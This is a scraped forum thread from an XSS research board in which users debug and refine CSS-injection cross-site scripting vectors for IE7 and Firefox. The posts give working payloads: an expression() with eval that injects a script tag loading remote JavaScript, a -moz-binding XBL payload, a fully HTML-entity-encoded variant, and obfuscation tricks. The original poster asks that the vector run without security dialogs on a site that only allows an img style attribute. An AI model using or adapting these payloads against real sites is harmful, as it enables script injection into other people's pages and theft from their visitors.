expression: doesn't work in IE? Hey guys, I'm trying to run this code (http://pastebin.com/f62d771e8), but I can't get it to work in IE7. What am I doing wrong? I need to use the img STYLE, with the "width:expression()" (can't use any other method on this website). With just "width:expression()" I can only do one statement, otherwise nothing happens. I need to execute multiple statements, as in the code. As I don't have access to a box with IE7 anymore, it'd be great if you could test any code yourself, and make sure no security dialogs pop-up during execution. Any help appreciated. Thanks! http://sla.ckers.org/forum/read.php?2,17804,17804#msg-17804 Wed, 19 Jun 2013 08:47:12 -0500 Phorum 5.2.15a http://sla.ckers.org/forum/read.php?2,17804,19870#msg-19870 Re: expression: doesn't work in IE? http://sla.ckers.org/forum/read.php?2,17804,19870#msg-19870
My mistake was in how I've inported the .css into the HTML

I used <link rel="stylesheet" type="text/css" href="test.css">
<div id="navigation">-- Test --</div> to import the .css

instead of

<style type="text/css">
@import url(http://www.example.com/css/last.css);
</style>

I guess it will still need to be hackvectorized even in the .css because of filters right ?

Anyway, thanks for your support and I think I'll stick around here cuz I really like the stuff in here ... maybe I can really contribute some day.]]> noconnexion XSS Info Mon, 21 Jan 2008 20:17:41 -0600 http://sla.ckers.org/forum/read.php?2,17804,19867#msg-19867 Re: expression: doesn't work in IE? http://sla.ckers.org/forum/read.php?2,17804,19867#msg-19867
The second example separates the style and HTML so it would be possible to use an external CSS file instead of the <style> tags. I didn't provide that because it's pretty easy to sort out.]]> Gareth Heyes XSS Info Mon, 21 Jan 2008 18:41:57 -0600 http://sla.ckers.org/forum/read.php?2,17804,19864#msg-19864 Re: expression: doesn't work in IE? http://sla.ckers.org/forum/read.php?2,17804,19864#msg-19864
@Gareth Heyes - I appreciate that you have answered but I guess I'm either dumb or blind as I cannot see any .css file in your examples. As stated earlier "I would like to have this 3 files work toghether on IE7." test.hmtl , test.css , xss.js. And if you are going to say that I need to take what's between <div style=" THIS " id="inject"> and place it into the .css file like I did earlier here div#inject { THIS } please don't as I've done that many many times and it won't work. Or maybe is something I miss here and if it's like that I appologise in advance.]]> noconnexion XSS Info Mon, 21 Jan 2008 18:03:40 -0600 http://sla.ckers.org/forum/read.php?2,17804,19807#msg-19807 Re: expression: doesn't work in IE? http://sla.ckers.org/forum/read.php?2,17804,19807#msg-19807
Sorry for the delay in getting back to you but I didn't have much time. I've finally got my hands on a crappy windoze box (I'm defo gonna get a VM going in future) and I've successfully tested both an external style sheet and a inline style on both browsers.

Inline:-
http://www.businessinfo.co.uk/labs/ultimate_xss_css/ultimate_xss_css1.php

Stylesheet:
http://www.businessinfo.co.uk/labs/ultimate_xss_css/ultimate_xss_css2.php

I've also updated Hackvertor to make it easier to create these vectors:-
http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php?input=PEBtb3piaW5kaW5nZXhwcmVzc2lvbj55b3VydXJsLmpzPEAvbW96YmluZGluZ2V4cHJlc3Npb24%2B

You can use Hackvertor to encode the styles further but I'll leave that up to you to experiment. Hope that helps

*NOTE* Firefox + Noscript silently disables mozbinding]]> Gareth Heyes XSS Info Mon, 21 Jan 2008 03:42:46 -0600 http://sla.ckers.org/forum/read.php?2,17804,19804#msg-19804 Re: expression: doesn't work in IE? http://sla.ckers.org/forum/read.php?2,17804,19804#msg-19804 I think the backslashes in e\xp\re\s\s\i\o\n are breaking the vector in IE. Instead of backslashes you could use comments in it like: expres/**/sion. You could place /*woohoocomment*/ between every char if you wanted and it'd still work.]]> riahmatic XSS Info Mon, 21 Jan 2008 01:31:38 -0600 http://sla.ckers.org/forum/read.php?2,17804,19790#msg-19790 Re: expression: doesn't work in IE? http://sla.ckers.org/forum/read.php?2,17804,19790#msg-19790
I've tried to explain this pretty well here hxxp://noconnexion.wordpress.com/ but I guess I was ignored because of my noob question so I've decided to try to steal 5 min from someone's time on this forum.

Let's get to the point. Like stated I would like to have this 3 files work toghether on IE7.

test.html
--------------------------------------
<html>
<body>

<link rel="stylesheet" type="text/css" href="test.css">
<div id="navigation">-- Test --</div>

</body>
</html>
--------------------------------------

test.css - and I'm pretty sure this where I need to work on
--------------------------------------
div#navigation
{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#x78&#x78&#x3A&#x20&#x65&#x5C&#x78&#x70&#x5C&#x72&#x65&#x5C&#x73&#x5C&#x73&#x5C&#x69&#x5C&#x6F&#x5C&#x6E&#x28&#x28&#x77&#x69&#x6E&#x64&#x6F&#x77&#x2E&#x72&#x21&#x3D&#x31&#x29&#x20&#x3F&#x20&#x65&#x76&#x61&#x6C&#x28&#x27&#x78&#x3D&#x53&#x74&#x72&#x69&#x6E&#x67&#x2E&#x66&#x72&#x6F&#x6D&#x43&#x68&#x61&#x72&#x43&#x6F&#x64&#x65&#x3B&#x73&#x63&#x72&#x3D&#x64&#x6F&#x63&#x75&#x6D&#x65&#x6E&#x74&#x2E&#x63&#x72&#x65&#x61&#x74&#x65&#x45&#x6C&#x65&#x6D&#x65&#x6E&#x74&#x28&#x78&#x28&#x31&#x31&#x35&#x2C&#x39&#x39&#x2C&#x31&#x31&#x34&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x32&#x2C&#x31&#x31&#x36&#x29&#x29&#x3B&#x73&#x63&#x72&#x2E&#x73&#x65&#x74&#x41&#x74&#x74&#x72&#x69&#x62&#x75&#x74&#x65&#x28&#x78&#x28&#x31&#x31&#x35&#x2C&#x31&#x31&#x34&#x2C&#x39&#x39&#x29&#x2C&#x78&#x28&#x31&#x30&#x34&#x2C&#x31&#x31&#x36&#x2C&#x31&#x31&#x36&#x2C&#x31&#x31&#x32&#x2C&#x35&#x38&#x2C&#x34&#x37&#x2C&#x34&#x37&#x2C&#x39&#x38&#x2C&#x31&#x31&#x37&#x2C&#x31&#x31&#x35&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x30&#x2C&#x31&#x30&#x31&#x2C&#x31&#x31&#x35&#x2C&#x31&#x31&#x35&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x30&#x2C&#x31&#x30&#x32&#x2C&#x31&#x31&#x31&#x2C&#x34&#x36&#x2C&#x39&#x39&#x2C&#x31&#x31&#x31&#x2C&#x34&#x36&#x2C&#x31&#x31&#x37&#x2C&#x31&#x30&#x37&#x2C&#x34&#x37&#x2C&#x31&#x30&#x38&#x2C&#x39&#x37&#x2C&#x39&#x38&#x2C&#x31&#x31&#x35&#x2C&#x34&#x37&#x2C&#x31&#x32&#x30&#x2C&#x31&#x31&#x35&#x2C&#x31&#x31&#x35&#x2C&#x34&#x37&#x2C&#x31&#x32&#x30&#x2C&#x31&#x31&#x35&#x2C&#x31&#x31&#x35&#x2C&#x34&#x36&#x2C&#x31&#x30&#x36&#x2C&#x31&#x31&#x35&#x29&#x29&#x3B&#x64&#x6F&#x63&#x75&#x6D&#x65&#x6E&#x74&#x2E&#x67&#x65&#x74&#x45&#x6C&#x65&#x6D&#x65&#x6E&#x74&#x42&#x79&#x49&#x64&#x28&#x78&#x28&#x20&#x31&#x30&#x35&#x2C&#x31&#x31&#x30&#x2C&#x31&#x30&#x36&#x2C&#x31&#x30&#x31&#x2C&#x39&#x39&#x2C&#x31&#x31&#x36&#x20&#x29&#x29&#x2E&#x61&#x70&#x70&#x65&#x6E&#x64&#x43&#x68&#x69&#x6C&#x64&#x28&#x73&#x63&#x72&#x29&#x3B&#x77&#x69&#x6E&#x64&#x6F&#x77&#x2E&#x72&#x3D&#x31&#x3B&#x27&#x29 : 1);
}
---------------------------------------

and xss.js witch need nothing to be done and it's located here: hxxp://businessinfo.co.uk/labs/xss/xss.js

The "source code" before it was "hackvectoreted" I guess is this one:

\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);xx: e\xp\re\s\s\i\o\n((window.r!=1) ? eval('x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(http://businessinfo.co.uk/labs/xss/xss.js));document.getElementById(x( 105,110,106,101,99,116 )).appendChild(scr);window.r=1;') : 1);

Have to mention that I have tried to include the css with @import and same result but I'm pretty sure this is not the point. The above files work on FF but not in IE7.
Can someone give me an answer ? PLEASE.

Ty.]]> noconnexion XSS Info Sun, 20 Jan 2008 13:31:06 -0600 http://sla.ckers.org/forum/read.php?2,17804,18185#msg-18185 Re: expression: doesn't work in IE? http://sla.ckers.org/forum/read.php?2,17804,18185#msg-18185 Gareth Heyes XSS Info Tue, 11 Dec 2007 00:50:16 -0600 http://sla.ckers.org/forum/read.php?2,17804,18162#msg-18162 Re: expression: doesn't work in IE? http://sla.ckers.org/forum/read.php?2,17804,18162#msg-18162
Wow! Thanks for the responses Gareth and Martin! Definitely no need for apologies or anything. I'm just glad that I could contribute something. This community basically kicks ass.

-Dan

I left comments your blogs, too. The progression/creation of that CSS injection is awesome.]]> DoctorDan XSS Info Mon, 10 Dec 2007 17:07:15 -0600 http://sla.ckers.org/forum/read.php?2,17804,18107#msg-18107 Re: expression: doesn't work in IE? http://sla.ckers.org/forum/read.php?2,17804,18107#msg-18107
I've updated my post on ultimate XSS CSS injection with credit for you:-
http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/

Please let me know if you have a blog and I'll add a link too]]> Gareth Heyes XSS Info Mon, 10 Dec 2007 03:53:06 -0600 http://sla.ckers.org/forum/read.php?2,17804,18105#msg-18105 Re: expression: doesn't work in IE? http://sla.ckers.org/forum/read.php?2,17804,18105#msg-18105
My apologies also - it's such a good tip that I saved it at the time and then completely forgot where it came from!]]> Martin XSS Info Mon, 10 Dec 2007 03:26:14 -0600 http://sla.ckers.org/forum/read.php?2,17804,18085#msg-18085 Re: expression: doesn't work in IE? http://sla.ckers.org/forum/read.php?2,17804,18085#msg-18085
If you were the first then I'm sorry I should have provided you with credit.
It wasn't deliberate, we're all friends here. I'll credit you on my blog as well.]]> Gareth Heyes XSS Info Sun, 09 Dec 2007 15:57:30 -0600 http://sla.ckers.org/forum/read.php?2,17804,18083#msg-18083 Re: expression: doesn't work in IE? http://sla.ckers.org/forum/read.php?2,17804,18083#msg-18083 did I come up with the window.r / ternary operator idea? I first posted it here at http://sla.ckers.org/forum/read.php?2,15812,page=1 , but I'm not sure if it was seen anywhere else beforehand. Because I always see the r variable used as I posted it, I think I may actually have contributed something here :P

Sorry, just wondering...
-Dan]]> DoctorDan XSS Info Sun, 09 Dec 2007 14:51:52 -0600 http://sla.ckers.org/forum/read.php?2,17804,17907#msg-17907 Re: expression: doesn't work in IE? http://sla.ckers.org/forum/read.php?2,17804,17907#msg-17907
The trick for multiple statements is to use an eval:

style=”xx: expression((window.r!=1) ? eval(’x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(104,116,116,112,58,47,47,ETC));document.getElementById(x(99,104,101,109,45,110,97,118,45,102,111,114,117,109)).appendChild(scr);window.r=1;’) : 1);

Here's an example from the post that Gareth mentioned. You need to decode/change the listed numbers to actual useful values to embed the <script> tag. Gareth's Hackvertor will help you construct a working string or this.]]> Martin XSS Info Sun, 02 Dec 2007 04:49:15 -0600 http://sla.ckers.org/forum/read.php?2,17804,17815#msg-17815 Re: expression: doesn't work in IE? http://sla.ckers.org/forum/read.php?2,17804,17815#msg-17815
Read this post by Martin, it may help:-
http://the-mice.co.uk/switch/?p=39]]> Gareth Heyes XSS Info Wed, 28 Nov 2007 03:53:53 -0600 http://sla.ckers.org/forum/read.php?2,17804,17804#msg-17804 expression: doesn't work in IE? http://sla.ckers.org/forum/read.php?2,17804,17804#msg-17804
As I don't have access to a box with IE7 anymore, it'd be great if you could test any code yourself, and make sure no security dialogs pop-up during execution.

Any help appreciated. Thanks!]]> mpcidm XSS Info Tue, 27 Nov 2007 19:45:46 -0600